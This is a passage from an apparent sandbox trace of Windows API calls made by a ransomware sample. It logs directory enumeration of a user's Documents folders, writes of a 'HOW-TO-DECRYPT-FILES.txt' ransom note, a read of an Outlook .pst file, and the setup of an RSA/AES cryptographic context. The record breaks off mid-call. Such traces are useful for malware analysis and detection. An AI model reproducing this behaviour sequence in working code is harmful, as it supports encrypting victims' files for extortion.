J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x79 [0059.322] GetLastError () returned 0xb7 [0059.322] SetErrorMode (uMode=0x1) returned 0x0 [0059.322] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\ebeKetTvZtWAx_\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\ebekettvztwax_\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.322] GetLastError () returned 0x5 [0059.323] SetErrorMode (uMode=0x0) returned 0x1 [0059.323] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Music", lpFilePart=0x0) returned 0x23 [0059.323] GetLastError () returned 0x5 [0059.323] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.324] GetLastError () returned 0x5 [0059.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.324] GetLastError () returned 0x5 [0059.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Music", lpFilePart=0x0) returned 0x23 [0059.324] GetLastError () returned 0x5 [0059.324] SetErrorMode (uMode=0x1) returned 0x0 [0059.324] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Music\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0059.324] GetLastError () returned 0x5 [0059.325] SetErrorMode (uMode=0x0) returned 0x1 [0059.325] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Pictures", lpFilePart=0x0) returned 0x26 [0059.325] GetLastError () returned 0x5 [0059.326] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.326] GetLastError () returned 0x5 [0059.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.326] GetLastError () returned 0x5 [0059.326] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Pictures", lpFilePart=0x0) returned 0x26 [0059.326] GetLastError () returned 0x5 [0059.326] SetErrorMode (uMode=0x1) returned 0x0 [0059.326] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Pictures\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0059.326] GetLastError () returned 0x5 [0059.327] SetErrorMode (uMode=0x0) returned 0x1 [0059.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFilePart=0x0) returned 0x24 [0059.328] GetLastError () returned 0x5 [0059.328] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.328] GetLastError () returned 0x5 [0059.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.328] GetLastError () returned 0x5 [0059.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFilePart=0x0) returned 0x24 [0059.328] GetLastError () returned 0x5 [0059.328] SetErrorMode (uMode=0x1) returned 0x0 [0059.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.333] GetLastError () returned 0x5 [0059.333] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.333] GetLastError () returned 0x5 [0059.333] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.334] GetLastError () returned 0x5 [0059.334] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.334] GetLastError () returned 0x5 [0059.334] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.334] GetLastError () returned 0x5 [0059.334] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.334] GetLastError () returned 0x12 [0059.334] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.334] SetErrorMode (uMode=0x0) returned 0x1 [0059.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFilePart=0x0) returned 0x24 [0059.334] GetLastError () returned 0x12 [0059.334] SetErrorMode (uMode=0x1) returned 0x0 [0059.334] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.334] GetLastError () returned 0x12 [0059.335] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.335] GetLastError () returned 0x12 [0059.335] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.335] GetLastError () returned 0x12 [0059.335] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.335] GetLastError () returned 0x12 [0059.335] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.335] GetLastError () returned 0x12 [0059.335] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.335] GetLastError () returned 0x12 [0059.335] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.335] SetErrorMode (uMode=0x0) returned 0x1 [0059.335] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\desktop.ini", lpFilePart=0x0) returned 0x30 [0059.335] GetLastError () returned 0x12 [0059.335] SetErrorMode (uMode=0x1) returned 0x0 [0059.335] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1bad8a0 | out: lpFileInformation=0x1bad8a0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x3beea730, ftCreationTime.dwHighDateTime=0x1d30236, ftLastAccessTime.dwLowDateTime=0x3beea730, ftLastAccessTime.dwHighDateTime=0x1d30236, ftLastWriteTime.dwLowDateTime=0x3beea730, ftLastWriteTime.dwHighDateTime=0x1d30236, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0059.337] GetLastError () returned 0x12 [0059.337] SetErrorMode (uMode=0x0) returned 0x1 [0059.338] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0059.338] GetLastError () returned 0x12 [0059.338] SetErrorMode (uMode=0x1) returned 0x0 [0059.338] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.339] GetLastError () returned 0x0 [0059.339] GetFileType (hFile=0x184) returned 0x1 [0059.339] SetErrorMode (uMode=0x0) returned 0x1 [0059.339] GetFileType (hFile=0x184) returned 0x1 [0059.339] WriteFile (in: hFile=0x184, lpBuffer=0x1bc9220*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1bc9220*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0059.340] GetLastError () returned 0x0 [0059.340] CloseHandle (hObject=0x184) returned 1 [0059.340] GetLastError () returned 0x0 [0059.340] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0059.340] GetLastError () returned 0x0 [0059.340] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.340] GetLastError () returned 0x0 [0059.340] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss", lpFilePart=0x0) returned 0x32 [0059.340] GetLastError () returned 0x0 [0059.341] SetErrorMode (uMode=0x1) returned 0x0 [0059.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\favorites.vss"), fInfoLevelId=0x0, lpFileInformation=0x1bcaec4 | out: lpFileInformation=0x1bcaec4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3beea730, ftCreationTime.dwHighDateTime=0x1d30236, ftLastAccessTime.dwLowDateTime=0x3beea730, ftLastAccessTime.dwHighDateTime=0x1d30236, ftLastWriteTime.dwLowDateTime=0x3beea730, ftLastWriteTime.dwHighDateTime=0x1d30236, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0059.341] GetLastError () returned 0x0 [0059.341] SetErrorMode (uMode=0x0) returned 0x1 [0059.341] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0059.341] GetLastError () returned 0x0 [0059.341] SetErrorMode (uMode=0x1) returned 0x0 [0059.341] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.341] GetLastError () returned 0x5 [0059.343] SetErrorMode (uMode=0x0) returned 0x1 [0059.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x2d [0059.343] GetLastError () returned 0x5 [0059.343] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.343] GetLastError () returned 0x5 [0059.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.343] GetLastError () returned 0x5 [0059.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x2d [0059.343] GetLastError () returned 0x5 [0059.343] SetErrorMode (uMode=0x1) returned 0x0 [0059.343] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.344] GetLastError () returned 0x5 [0059.344] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.344] GetLastError () returned 0x5 [0059.344] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.344] GetLastError () returned 0x5 [0059.344] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.344] GetLastError () returned 0x12 [0059.345] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.345] SetErrorMode (uMode=0x0) returned 0x1 [0059.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x2d [0059.345] GetLastError () returned 0x12 [0059.345] SetErrorMode (uMode=0x1) returned 0x0 [0059.345] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.345] GetLastError () returned 0x12 [0059.345] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.345] GetLastError () returned 0x12 [0059.345] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.345] GetLastError () returned 0x12 [0059.345] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.345] GetLastError () returned 0x12 [0059.345] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.346] SetErrorMode (uMode=0x0) returned 0x1 [0059.346] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x38 [0059.346] GetLastError () returned 0x12 [0059.346] SetErrorMode (uMode=0x1) returned 0x0 [0059.346] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\_private\\folder.ico"), fInfoLevelId=0x0, lpFileInformation=0x1be9d9c | out: lpFileInformation=0x1be9d9c*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x3beea730, ftCreationTime.dwHighDateTime=0x1d30236, ftLastAccessTime.dwLowDateTime=0x3beea730, ftLastAccessTime.dwHighDateTime=0x1d30236, ftLastWriteTime.dwLowDateTime=0x3beea730, ftLastWriteTime.dwHighDateTime=0x1d30236, nFileSizeHigh=0x0, nFileSizeLow=0x74e6)) returned 1 [0059.346] GetLastError () returned 0x12 [0059.346] SetErrorMode (uMode=0x0) returned 0x1 [0059.347] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.347] GetLastError () returned 0x12 [0059.347] SetErrorMode (uMode=0x1) returned 0x0 [0059.347] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\_private\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.347] GetLastError () returned 0x0 [0059.347] GetFileType (hFile=0x184) returned 0x1 [0059.347] SetErrorMode (uMode=0x0) returned 0x1 [0059.347] GetFileType (hFile=0x184) returned 0x1 [0059.347] WriteFile (in: hFile=0x184, lpBuffer=0x1c05c18*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ecc0, lpOverlapped=0x0 | out: lpBuffer=0x1c05c18*, lpNumberOfBytesWritten=0x18ecc0*=0x18da, lpOverlapped=0x0) returned 1 [0059.348] GetLastError () returned 0x0 [0059.348] CloseHandle (hObject=0x184) returned 1 [0059.348] GetLastError () returned 0x0 [0059.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0059.348] GetLastError () returned 0x0 [0059.348] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\_private\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.348] GetLastError () returned 0x0 [0059.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Videos", lpFilePart=0x0) returned 0x24 [0059.348] GetLastError () returned 0x0 [0059.348] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.348] GetLastError () returned 0x0 [0059.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.349] GetLastError () returned 0x0 [0059.349] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\My Videos", lpFilePart=0x0) returned 0x24 [0059.349] GetLastError () returned 0x0 [0059.349] SetErrorMode (uMode=0x1) returned 0x0 [0059.349] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Videos\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0059.349] GetLastError () returned 0x5 [0059.350] SetErrorMode (uMode=0x0) returned 0x1 [0059.350] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x28 [0059.350] GetLastError () returned 0x5 [0059.351] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.351] GetLastError () returned 0x5 [0059.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.351] GetLastError () returned 0x5 [0059.351] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x28 [0059.351] GetLastError () returned 0x5 [0059.351] SetErrorMode (uMode=0x1) returned 0x0 [0059.351] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.358] GetLastError () returned 0x5 [0059.359] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.359] GetLastError () returned 0x5 [0059.359] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.359] GetLastError () returned 0x5 [0059.359] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.359] GetLastError () returned 0x5 [0059.359] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.359] GetLastError () returned 0x12 [0059.359] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.360] SetErrorMode (uMode=0x0) returned 0x1 [0059.360] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x28 [0059.360] GetLastError () returned 0x12 [0059.360] SetErrorMode (uMode=0x1) returned 0x0 [0059.360] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0059.361] GetLastError () returned 0x12 [0059.361] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.361] GetLastError () returned 0x12 [0059.362] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.362] GetLastError () returned 0x12 [0059.362] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.362] GetLastError () returned 0x12 [0059.362] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.362] GetLastError () returned 0x12 [0059.362] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0059.363] SetErrorMode (uMode=0x0) returned 0x1 [0059.363] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.363] GetLastError () returned 0x12 [0059.363] SetErrorMode (uMode=0x1) returned 0x0 [0059.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), fInfoLevelId=0x0, lpFileInformation=0x1c09de0 | out: lpFileInformation=0x1c09de0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e91a80, ftCreationTime.dwHighDateTime=0x1d2fb32, ftLastAccessTime.dwLowDateTime=0x74e91a80, ftLastAccessTime.dwHighDateTime=0x1d2fb32, ftLastWriteTime.dwLowDateTime=0x22d91e60, ftLastWriteTime.dwHighDateTime=0x1d2fb33, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0059.364] GetLastError () returned 0x12 [0059.364] SetErrorMode (uMode=0x0) returned 0x1 [0059.365] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.365] GetLastError () returned 0x12 [0059.365] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.365] GetLastError () returned 0x12 [0059.365] SetErrorMode (uMode=0x1) returned 0x0 [0059.365] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.365] GetLastError () returned 0x0 [0059.365] GetFileType (hFile=0x184) returned 0x1 [0059.365] SetErrorMode (uMode=0x0) returned 0x1 [0059.365] GetFileType (hFile=0x184) returned 0x1 [0059.365] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x42400 [0059.365] GetLastError () returned 0x0 [0059.367] ReadFile (in: hFile=0x184, lpBuffer=0x2bb1fc0, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2bb1fc0*, lpNumberOfBytesRead=0x18ed18*=0x42400, lpOverlapped=0x0) returned 1 [0059.381] GetLastError () returned 0x0 [0059.381] CloseHandle (hObject=0x184) returned 1 [0059.381] GetLastError () returned 0x0 [0059.383] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.383] GetLastError () returned 0x0 [0059.383] SetErrorMode (uMode=0x1) returned 0x0 [0059.383] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e91a80, ftCreationTime.dwHighDateTime=0x1d2fb32, ftLastAccessTime.dwLowDateTime=0x74e91a80, ftLastAccessTime.dwHighDateTime=0x1d2fb32, ftLastWriteTime.dwLowDateTime=0x22d91e60, ftLastWriteTime.dwHighDateTime=0x1d2fb33, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0059.383] GetLastError () returned 0x0 [0059.383] SetErrorMode (uMode=0x0) returned 0x1 [0059.383] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c4e8) returned 1 [0059.383] GetLastError () returned 0x0 [0059.417] CryptImportKey (in: 